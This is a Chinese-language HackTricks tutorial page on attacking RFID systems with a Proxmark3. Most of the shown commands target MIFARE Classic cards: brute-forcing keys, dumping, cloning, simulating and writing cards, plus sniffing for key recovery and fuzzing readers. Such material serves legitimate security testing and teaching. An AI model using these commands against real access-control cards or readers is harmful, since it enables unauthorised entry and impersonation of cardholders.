7.1 KiB
Proxmark 3
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一个 网络安全公司 工作吗?你想在 HackTricks 中看到你的 公司广告 吗?或者你想获得 PEASS 的最新版本或下载 HackTricks 的 PDF 吗?查看 订阅计划!
- 发现我们的独家 NFTs 集合 The PEASS Family
- 获取 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或 telegram 群组 或 关注 我的 Twitter 🐦@carlospolopm.
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。
找到最重要的漏洞,以便更快地修复它们。Intruder 跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从 API 到 Web 应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
使用 Proxmark3 攻击 RFID 系统
你首先需要拥有一个 Proxmark3 并且 安装软件及其依赖项s。
攻击 MIFARE Classic 1KB
它有 16 个扇区,每个扇区有 4 个块,每个块包含 16B。UID 在扇区 0 块 0 中(不能更改)。
要访问每个扇区,你需要 2 个密钥(A 和 B),它们存储在每个扇区的 块 3 中(扇区尾部)。扇区尾部还存储了 访问位,使用这两个密钥对每个块进行 读取和写入 权限控制。
如果你知道第一个密钥,第二个密钥对于读取权限很有用,如果你知道第二个密钥,第一个密钥对于写入权限很有用(例如)。
可以执行多种攻击方法
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
Proxmark3允许执行其他操作,例如窃听标签与读卡器之间的通信,以尝试找到敏感数据。在这种卡片中,您可以仅仅通过嗅探通信并计算使用的密钥,因为使用的加密操作是薄弱的,通过知道明文和密文,您可以计算出它(mfkey64
工具)。
原始命令
物联网系统有时使用非品牌或非商业标签。在这种情况下,您可以使用Proxmark3向标签发送自定义的原始命令。
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
通过这些信息,您可以尝试搜索有关该卡片以及与其通信的方式的信息。Proxmark3允许发送原始命令,例如:hf 14a raw -p -b 7 26
脚本
Proxmark3软件附带了一系列预加载的自动化脚本,您可以使用这些脚本执行简单的任务。要检索完整列表,请使用script list
命令。然后,使用script run
命令,后跟脚本的名称:
proxmark3> script run mfkeys
你可以创建一个脚本来模糊测试标签读卡器,通过复制一个有效卡片的数据,编写一个Lua脚本来随机化一个或多个随机字节,并检查读卡器在任何迭代中是否崩溃。
找到最重要的漏洞,以便您可以更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组,或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。